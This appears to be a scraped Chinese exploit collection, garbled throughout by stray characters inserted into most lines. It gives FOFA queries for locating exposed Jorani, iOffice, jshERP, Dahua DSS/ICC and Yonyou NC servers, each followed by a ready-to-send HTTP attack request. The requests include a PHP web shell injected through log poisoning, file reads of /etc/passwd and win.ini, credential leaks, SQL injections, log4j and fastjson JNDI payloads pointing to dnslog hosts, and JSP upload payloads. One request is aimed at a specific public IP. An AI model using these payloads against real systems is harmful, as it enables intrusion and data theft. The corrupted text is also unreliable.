Cache-Control: no-cache$ v# J: q+ o& L6 h+ f* R
Upgrade-Insecure-Requests: 1
( G( T& ~6 Q, u7 i; nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% X9 l H4 X/ a& Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: g2 T! E: k* g+ bAccept-Encoding: gzip, deflate2 I" Y$ t% S4 p* o
Accept-Language: zh-CN,zh;q=0.9,en;q=0.84 N& s& {; }" o; x
Connection: close
) {* e5 i& |5 C0 z. Y1 q9 ~7 a5 U* |" X0 z3 P
" N( ?: F) p) r, [" U( J12. Jorani < 1.0.2 远程命令执行5 S. J( R; K) ~
FOFA:title="Jorani" r- h. `7 y. B2 ]
第一步先拿到cookie' R" k6 D0 t# f% W: u& _
GET /session/login HTTP/1.16 c( L2 s$ X' r# i
Host: 192.168.190.30
1 A" x- f$ E" u6 r6 c+ nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
8 V- D4 e/ E8 c0 a, A9 l# _Connection: close
" v6 a% n% y: O6 ~ \9 q- GAccept-Encoding: gzip
( P% m- v x$ g5 Z' {. K
- x% w5 L8 H" m. H: w
: {! R3 v6 a2 @- x/ l/ ?; i* P响应中csrf_cookie_jorani用于后续请求' M- ~# K. h) P! ~5 M: P
HTTP/1.1 200 OK0 W* `% ~: h7 h9 O0 B+ H
Connection: close
+ J ]; y m! [' a( \( u9 W( mCache-Control: no-store, no-cache, must-revalidate6 c" s, N. j5 r* O
Content-Type: text/html; charset=UTF-89 T' ~7 I3 s3 w6 [& ~
Date: Tue, 24 Oct 2023 09:34:28 GMT
9 T3 W3 B) b/ b* c) A D1 j. M3 IExpires: Thu, 19 Nov 1981 08:52:00 GMT
: f4 s" z' ]0 V& C' dLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
, ~7 R3 U) W& J/ rPragma: no-cache2 h6 t4 K- g4 T. E* v) n
Server: Apache/2.4.54 (Debian)
- w2 _+ P! M8 z5 P+ V/ QSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/0 [0 ?, F+ {, t2 \
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly: s' A4 t& H: ]/ u. p3 _
Vary: Accept-Encoding4 H0 d& g- A# o; ?$ H: g0 i) O* c
; l5 G* E( ?: N+ C7 W
; r: a. W2 G" c7 MPOST请求,执行函数并进行base64编码8 N& R' k* \0 g, M, E
POST /session/login HTTP/1.1) i! b: d0 Z! O+ d9 X* s
Host: 192.168.190.30
- v+ N9 X0 X+ e: G' H/ zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
U+ `# I' G9 V7 r% GConnection: close
, d7 ]( y6 G# t1 r* M1 iContent-Length: 252
+ T' S9 D( h' J. N: mContent-Type: application/x-www-form-urlencoded. @5 C* ?4 g; a+ s3 ^
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r( d) U5 S8 C( V, |( ~) @5 o
Accept-Encoding: gzip$ c% L! K, u/ @% e2 x# Z; m
9 S4 x7 N% W7 Y B$ X
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor E1 U0 J7 F- z- X
2 o3 Z2 n. o$ e6 U
} p3 X2 z, K4 L; g7 c' m1 T- x5 W. U2 i6 F9 S# ]& e3 u
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串4 a1 \5 Q& s& t; Q- b1 z* q- D2 X5 B
GET /pages/view/log-2023-10-24 HTTP/1.10 y5 V- U3 f! u! K3 k7 s+ J" d
Host: 192.168.190.30
7 a7 E; V7 |" \; KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 R$ q$ Q( S, M: y6 m
Connection: close8 I) X" M& ^( }, n
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
( U* `0 N6 U) O% N4 a9 WK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
" H" |. y a7 a% iX-REQUESTED-WITH: XMLHttpRequest
, p9 |) T6 S( G0 c0 k8 }1 r# ZAccept-Encoding: gzip+ x! Q9 o/ T& O
* V: X W- u) j$ B3 n* r4 {
; b* k) Z, \. l) Y) y* ]" \2 L1 K; h/ m) O13. 红帆iOffice ioFileDown任意文件读取
# o8 d& W0 k' L6 x+ u/ JFOFA:app="红帆-ioffice"
1 A5 p+ E: w& h) M- |8 G) Y4 fGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.18 _/ D4 h8 X4 O! o- ^4 Z+ Q! l
Host: x.x.x.x$ o" ]) _8 @0 n9 R$ S7 n/ F2 f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
7 I7 h# W/ Q5 X& q" [Connection: close* X# X8 }; v$ {4 i1 U) l* m, `8 d4 H$ \
Accept: */*5 U! z- h# q' w, u: J
Accept-Encoding: gzip
3 g: N, c+ x* n+ ~+ [+ |* R7 g1 J5 R' n1 a/ G7 C
s/ H/ C- T+ X" A9 y5 ]14. 华夏ERP(jshERP)敏感信息泄露
. B/ [* t: _1 g& w/ i/ E- KFOFA:body="jshERP-boot"
' s7 T& o9 q3 u2 C; a& a, D% I) n泄露内容包括用户名密码* q3 s* \, e7 j8 Y e# A5 w: c
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1+ K! a* s. h* s( p; Z1 d% l
Host: x.x.x.x1 X* L( o9 |8 _: {5 H5 u8 |/ q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36$ Y' ]8 M4 y7 h& V% n; h
Connection: close
( F2 _2 x# ?9 C0 Z& D0 ~# P8 JAccept: */*+ I/ U8 W6 ?+ O& w
Accept-Language: en
; G6 t# b0 Q5 p: b3 z4 CAccept-Encoding: gzip
. g4 v7 Z/ g& ~1 n& B9 c& A3 r' _" `$ G0 \0 n5 \0 ^
, ]4 t) ^) t% ?7 {' L" z; l4 ?15. 华夏ERP getAllList信息泄露
3 `2 ?8 S4 a3 z' n( BCVE-2024-0490
0 s. N9 z2 m0 o. U- z+ G: xFOFA:body="jshERP-boot"
- y5 N& M, Y/ J( I" @泄露内容包括用户名密码
! m; X3 j0 j1 B+ F, n( c% B7 q4 B# MGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
3 t6 @* L. t* Y; EHost: 192.168.40.130:100" e+ q! N+ v4 [+ m/ a4 d( [( f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
. h9 H% z. \. J' I+ Y/ b, SConnection: close
0 q9 }2 A/ N. b' Y8 G- H# xAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8! v" f) Z# b {
Accept-Language: en5 |! D' a- T# B ~+ j
sec-ch-ua-platform: Windows- c, [$ _7 f1 S( ~& P8 r
Accept-Encoding: gzip9 }. N0 C. u( s' B% z k* }3 U6 ? S
5 O1 k0 @4 s* z# k3 X. m( r1 M! v3 k, X
16. 红帆HFOffice医微云SQL注入
8 ^4 L/ W; N' V$ O3 f& ]FOFA:title="HFOffice"
4 I/ v$ b+ h: j x2 Jpoc中调用函数计算1234的md5值6 r9 R$ a2 A) G7 ?( ~) e" ^
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
8 t1 a+ R- J' w0 M! eHost: x.x.x.x8 J# W$ U" \ w% n8 i1 W8 k" R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
8 @$ N ^( S% g, I1 t. c: {Connection: close
4 s0 g* M/ ?* jAccept: */*! N6 z* h* s/ S* G& t
Accept-Language: en( f+ a7 H4 W# G; I
Accept-Encoding: gzip
+ a1 X- |3 P9 \, W/ [# ~7 @ G) H! }. `$ w* n- @# d k; E
* K1 c- m; |2 q* P) K8 k17. 大华 DSS itcBulletin SQL 注入5 ~" i! L( E" U4 a9 w3 q. T, t
FOFA:app="dahua-DSS"% s3 f6 A! f- D: o
POST /portal/services/itcBulletin?wsdl HTTP/1.1
u' N3 ~$ a/ d+ nHost: x.x.x.x
5 ~; D" i( ~+ {7 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 g, h; i* v' V' CConnection: close9 g$ P6 S4 y: f3 r+ M
Content-Length: 345
) p* [" ]# M2 m4 r* ]* |Accept-Encoding: gzip
5 S% x; K% O6 x" i/ J+ a
. w- U* X& }% }/ {7 D7 t9 e<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>7 e g" H8 i3 a' g% m" _# w8 O
<s11:Body>
1 |* C; ~/ Q3 f6 O X <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
9 h; H! x* U) |! I <netMarkings>8 |; I& v$ [; U4 \4 h# u! M
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1! Y( Q& W: g8 S6 K( {* v
</netMarkings>2 [2 v: X. p% p) A( [
</ns1:deleteBulletin>; p( `, m2 D% n* {( ?
</s11:Body>
) T% j+ |; l" ]# \</s11:Envelope>6 C9 N! H/ G3 |
! N+ J U6 }0 L& V
8 U9 d2 s( A. `7 z18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
5 a% l9 f5 U2 U) ~FOFA:app="dahua-DSS"7 u# l9 U; v- w1 [+ G) j# j6 S! H
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
* F* H5 d- E6 z- D' }( O! x' DHost: your-ip& h3 n! r; N, I! t* ~( c+ r2 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, U8 a* n% j t+ g. M, a
Accept-Encoding: gzip, deflate& H' |+ \8 z* B
Accept: */*3 j- R9 d/ c( s' i" j; |
Connection: keep-alive
- q" F/ m5 X7 p: N6 t7 H8 |& X( J, t2 y1 I2 |# K# _
/ [/ D) e0 O6 j+ D8 b6 ~+ @8 }: L0 H2 { L
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入6 D1 I& n0 n0 T8 ^4 H
FOFA:app="dahua-DSS"
( J9 y* Q1 K3 T& ]GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1& B7 h) A9 r+ X7 }! @8 J" Y) z. M
Host:1 a2 a* D( q* Y+ S) V- m
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36) j! {; l7 p' U, C+ d+ `7 ~0 o$ l
Accept-Encoding: gzip, deflate
N3 v- N" G5 N+ FAccept: */*" C% F2 O3 n' Q
Connection: keep-alive
; o& S a3 Q2 W& ?1 N, B9 M9 B+ B: g% e8 P0 W
, K3 V3 B8 M- B' w$ Y* A20. 大华ICC智能物联综合管理平台任意文件读取1 C# Z0 q& Q9 x- k
FOFA:body="*客户端会小于800*"
% Q9 ^( `1 s4 r7 L' {GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.11 \ i2 ~% Q* ?/ M3 C3 Y9 e% X0 R, |6 B
Host: x.x.x.x
+ m' V! t: p) j8 j( v, q& ~User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 S2 d% ~5 {1 c( f8 hConnection: close
b7 x+ m( [$ }' x2 AAccept: */*( m2 C. I0 L; W1 }% U
Accept-Language: en6 R& ^8 T J2 x# B% A
Accept-Encoding: gzip
& S E2 k/ N6 ?3 r' c: C2 B. \' d
& Y* p3 k8 A; p& X5 C( p4 s' z- x' R( E6 T. l
21. 大华ICC智能物联综合管理平台random远程代码执行
" I: J. o- b! V9 `2 LFOFA:icon_hash="-1935899595"
! j: I) R! `; q$ a5 R( s: F5 ]POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.13 z/ p6 g/ h* C0 `# D
Host: x.x.x.x
& {5 }8 n* u) Y/ [6 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) x( H( z2 D. d2 f2 ?5 k- Q7 |
Content-Length: 161! S7 G* Y3 N8 [/ @8 p4 C
Accept-Encoding: gzip
* G/ O& B# ^! h3 }& X' r* UConnection: close
' `5 k$ `" @0 Q5 rContent-Type: application/json;charset=utf-8 h1 f6 {) r" t c0 E u3 E q, I
. w* z4 s9 [! ~/ n% K8 |
{
& j+ n+ u6 w' X"a":{8 ~+ V! M- {! ?+ q/ g( }! M
"@type":"com.alibaba.fastjson.JSONObject",4 h2 ]" K x5 B. t
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}' |- q2 i. e1 Z! X% K! v8 K) E
}""
5 }/ `7 v+ o' D% k* Q" T6 F}+ v- m. q+ H% s I& S
6 K7 @# v/ j1 x
5 |( s5 B; `3 }0 q! e3 A22. 大华ICC智能物联综合管理平台 log4j远程代码执行5 F9 T$ d/ P# N: F5 a7 T
FOFA:icon_hash="-1935899595"
% Z, V) K' b( c6 W' W( tPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.14 c+ v: {2 g- E. z* L5 Q. A" _
Host: your-ip" s0 C8 ^7 U7 J3 J' T5 W! q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 n' q9 G9 H% X+ }5 }Content-Type: application/json;charset=utf-8; Z- n& V4 z2 N/ m( Q2 H
6 t$ d, W# K% K9 M! `: k
{
0 D [! s% l# X0 }- W"loginName":"${jndi:ldap://dnslog}"! s: |) L, s( p1 f3 c
}' E; N! C2 p) ^9 q- u+ B0 e$ `
; T# h1 C( v% s5 o. x# g8 l7 k* w
( m, W! p3 E4 P9 F
/ h. }+ i% }( r2 [/ [2 q ?0 q23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
% j, m4 l5 s: s% a X/ S/ XFOFA:icon_hash="-1935899595"3 g8 M v! w+ ~0 | S" s
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1: }* Y$ h/ t# [, n
Host: your-ip0 M$ U) B9 G. J6 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- g/ H n) g$ l _% K- \( L
Content-Type: application/json;charset=utf-8* `* B4 K: x8 w+ ?& G
Accept-Encoding: gzip
: R# ~" f9 t# |! v) cConnection: close
' Q, w' G% U$ |4 @- d
+ S! }! c9 A8 C+ z+ X- }) W5 [{4 W; u2 `; _6 D8 a" v
"a":{9 i0 D' n4 N" j/ f
"@type":"com.alibaba.fastjson.JSONObject",3 Z/ R- Y* H! X, |1 P* u* |0 ]6 w
{"@type":"java.net.URL","val":"http://DNSLOG"}
4 C$ b# s3 ^+ D s% Z7 b }""- K7 V. g! I! ?. p$ |' e1 x
}
( o# h" e, q; G/ A7 H. }( d( p& K9 R- ~: E
1 ?$ T& _! Q" _9 h G* M' M* K
24. 用友NC 6.5 accept.jsp任意文件上传
4 ` E' i7 \# V# S8 YFOFA:icon_hash="1085941792"( v! ] K: V6 _% m
POST /aim/equipmap/accept.jsp HTTP/1.1# J+ Y4 F4 j; o+ w4 {
Host: x.x.x.x
1 S6 p; j) {# @) WUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.361 {8 w) ^. @: S$ i% Q9 p2 o
Connection: close
; t/ }: ]- T$ H: L$ xContent-Length: 449
( Q0 [- l1 s1 c5 }Accept: */*7 @4 B1 b6 \" i
Accept-Encoding: gzip
+ D& H K8 {, g3 L- pContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
4 X5 B0 C7 }; Q/ S( X) L1 d, z; Y' u
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' _. q5 ]% v: v( b4 ^5 r+ l
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
' d+ E2 o1 ^ EContent-Type: text/plain
# ?7 F2 a1 A. V
1 w$ p3 X P0 M( `<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
7 j2 f$ a& y g. x. ]-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
' @8 c3 o+ I$ t3 n4 Y3 _. FContent-Disposition: form-data; name="fname"! G6 q# G0 m. V1 {( `$ ^
& ?8 L' k# I* M6 r. k! W
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
, D! o! l0 m. C-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--; s5 y9 u- p l7 u
/ e* w0 t; t9 w* @# N p2 i' u4 t ^+ q3 [
25. 用友NC registerServlet JNDI 远程代码执行
) c" W* `9 t! S" g8 WFOFA:app="用友-UFIDA-NC"
2 u$ M- z& H* L6 ]. dPOST /portal/registerServlet HTTP/1.1
- d _% l( y6 B8 cHost: your-ip
4 \$ q N& L4 H! H& c0 M3 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0& i: [4 X7 x* a- u6 ]2 \/ i$ ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9" p/ Q( ]/ z: B6 a- Y; q! x
Accept-Encoding: gzip, deflate
7 j: z* u6 |6 T+ e! `$ ~7 s4 @Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.64 ?8 N8 \* p2 W, {% T; E
Content-Type: application/x-www-form-urlencoded2 K# E& m v' e5 Y
0 T( @- M, b, I- ]type=1&dsname=ldap://dnslog
" D1 c. R% V* ^% y/ O! e8 w3 x- L' d4 S( K5 d/ j1 t, |' Q
3 u' ]! q7 d; a9 l# i e, W- O: [# \/ j* w
26. 用友NC linkVoucher SQL注入 e5 ]% i/ K7 K
FOFA:app="用友-UFIDA-NC"; A5 |/ O$ n4 k/ K+ O
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.12 b6 Z. ?. K6 z- B% `! F
Host: your-ip
1 o8 m3 R) c8 N. U2 A# p* pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 o h4 L' D6 k
Content-Type: application/x-www-form-urlencoded8 J) Y) k* E9 v, t. A& F
Accept-Encoding: gzip, deflate
* x1 R* T$ i. S4 ~0 @4 P9 FAccept: */*
' o! s, B2 q% ?( y/ N4 XConnection: keep-alive
3 s6 n- Q3 R. E( g; T) R# d* q
& r$ W3 z( |4 P2 x+ e7 ]
7 i* g5 m3 u* s( U& a% `- r, J27. 用友 NC showcontent SQL注入! N o( T* \! f# x- P/ c
FOFA:icon_hash="1085941792"
8 c. [) n# F) `0 x8 z5 wGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1: H, d6 o \* [" J) e
Host: your-ip
6 y+ R: a' I6 ]- T: GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ ^8 ~6 `& ~. J8 i6 b$ H# T/ fAccept-Encoding: identity- A2 E: q# C s
Connection: close
: @6 |2 c: F! w5 RContent-Type: text/xml; charset=utf-8
# ~, j( r! c' k$ f% l: B ]- Z0 f
% c, L! E0 e m B& V5 l
28. 用友NC grouptemplet 任意文件上传
% W6 u) K& n% G5 a5 ^! H. nFOFA:icon_hash="1085941792"
/ K5 |+ W5 [9 V; h( YPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1' ^/ D2 L. e1 X
Host: x.x.x.x
, P0 ~% o, y% D' y' L* E$ sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
2 L; ?( r8 f* a7 UConnection: close. l/ H3 H# [! f# J, O E
Content-Length: 268
% b, d9 [1 o" b3 V& ?1 JContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk+ t% v5 N: e7 v* d, X4 S7 G
Accept-Encoding: gzip
9 C6 b$ M8 z' C4 `3 n% _0 i, `; B' e+ _6 c8 F( ?4 h$ [6 r
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
& w, C" e* Q8 c1 p$ l% ]$ I4 z- bContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"4 J0 l8 Q: k& m$ |3 n% N5 l
Content-Type: application/octet-stream
% Q' B7 G6 n% x& e- G7 _
; ~& T/ `. {4 I) f" `4 E2 X5 R& [2 [<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
7 F6 ?& t/ [3 }8 }2 e6 B! Q6 q: j------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--, g4 f1 s. F% f: g. V0 |" m
; |1 q$ N. y5 Z" S' [9 C
" |+ o2 P" x: \9 |, J* U/uapim/static/pages/nc/head.jsp" `5 G* @$ b, ]' d; D9 j
; E6 v# d- l+ J# K+ Y, x* d
29. 用友NC down/bill SQL注入/ R6 W1 \, P. Q9 I) q
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- N( [0 y2 A( k, v: g @GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
- ~0 m- n; q4 i/ m& Q. G5 [Host: your-ip
* [+ f) Z8 l/ H0 B, e& aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! t5 C1 h, S+ L9 A$ v4 jContent-Type: application/x-www-form-urlencoded9 Q, f3 \9 I X8 U# Q
Accept-Encoding: gzip, deflate" y* o- \/ y3 g: w$ x. C0 B; _
Accept: */** P; f4 K) T; C; _) \' Z" t
Connection: keep-alive
: M9 U U/ @/ {! |8 M7 {
% U% n! _# ]2 B, h+ y" q* B8 w
) M' w! g$ d: J' u30. 用友NC importPml SQL注入* g8 i+ u5 Z2 @" c
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
: f1 m I' r* J$ kPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
5 Y$ b) X; A7 A( e! ?1 M4 iHost: your-ip M9 P! x+ T" c. U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
4 v3 }/ |0 p8 T! JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36. E d! B7 I. g
Connection: close
- X" X7 x6 S/ m- ^1 R" e" Y% T/ B- }4 _7 } c9 q
------WebKitFormBoundaryH970hbttBhoCyj9V
% D/ E; j" ^% `) `6 y$ E" Y6 ZContent-Disposition: form-data; name="Filedata"; filename="1.jpg"; g% X4 T$ `- J
Content-Type: image/jpeg
" `: k0 T! n- I1 r9 z1 A------WebKitFormBoundaryH970hbttBhoCyj9V--
% { @) m! u& z: r' _' A% T
]) a( m" X! J) L! }" g
9 i; m1 [* _5 i9 v( }0 z' X31. 用友NC runStateServlet SQL注入( m# {8 ]5 ?" q" G
version<=6.5
3 B2 G/ T& k/ N! O- O" V# GFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"! ?/ [+ ]+ @) l! ]* J4 v6 E
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% S5 Q' m' g% g8 V* P& lHost: host
B8 H0 H" P: h3 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
9 B) x A* l: C1 F9 B T0 SContent-Type: application/x-www-form-urlencoded
# _) i% {# n3 K$ L0 s( d3 u
2 g; P0 U8 q: [/ H- k, |& g% G) f# }! d0 G3 O1 @
32. 用友NC complainbilldetail SQL注入
3 R _* R0 V) a! F5 x1 \$ dversion= NC633、NC650 b7 I4 m- V) G6 w
FOFA:app="用友-UFIDA-NC"7 x" X% u0 _2 r/ G: Y' m, Y7 A5 t- K
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 s1 @6 r7 l9 g8 Y' MHost: your-ip
: b) k: m7 q1 y1 B0 [* x3 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 J$ D' o6 V) E2 MContent-Type: application/x-www-form-urlencoded
2 J. O0 u0 ~5 y# hAccept-Encoding: gzip, deflate
3 @% H, m; w3 i0 FAccept: */*
" ~+ W) |1 S# d+ E0 F, J9 @ cConnection: keep-alive
3 V1 E7 g; U/ n: w/ K& U1 z0 K3 B9 c4 E9 H* Q4 e
2 @. t6 Q. m5 P% p
33. 用友NC downTax/download SQL注入
( E( \; E! @8 @version:NC6.5FOFA:app="用友-UFIDA-NC"( s! V$ a: Y6 H5 G1 S( o: z
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
& J3 f6 F8 e6 k2 UHost: your-ip
) t7 [1 t6 Q7 r/ y! r1 _+ BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 t9 c; V6 p8 B' e! S
Content-Type: application/x-www-form-urlencoded
; @# H0 `* H8 P' KAccept-Encoding: gzip, deflate9 [7 b% _ s" x8 A
Accept: */*% B. K$ n& p! Z4 }% I( b% L
Connection: keep-alive
- L! H& g3 a8 D1 A5 H
# H: m+ r7 x+ I" k" ?! h% O2 c3 l! V( p) |! F1 O2 X) u5 O
34. 用友NC warningDetailInfo接口SQL注入
8 L: w$ o, B: y0 t zFOFA:app="用友-UFIDA-NC"
! F2 }, e4 d# m- R: ] ZGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
; d4 n1 r. T/ b! k5 c4 G, q, ]+ \Host: your-ip
4 ?7 e m/ r# t" Z$ OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* r/ t. w7 m- b6 l7 k! y
Content-Type: application/x-www-form-urlencoded3 U4 k5 J! c) s4 {7 p) k( U' Q
Accept-Encoding: gzip, deflate
4 k5 C9 y+ Z7 J) Y2 k' vAccept: */*
8 B$ f( l9 o# @9 WConnection: keep-alive/ q1 C0 V7 N4 z+ h
( W) Q# b+ j9 S( N
, ?& w; \% e% ^; s ^35. 用友NC-Cloud importhttpscer任意文件上传
4 x0 Z+ U$ K) GFOFA:app="用友-NC-Cloud". i; }% c* C) y
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.15 |6 J1 [( ?! Q* b# W7 Y
Host: 203.25.218.166:8888
& d8 j- p/ `: h2 hUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info0 y3 Z% z& t) T( c% I
Accept-Encoding: gzip, deflate
( t C) G; i* N8 `" BAccept: */*
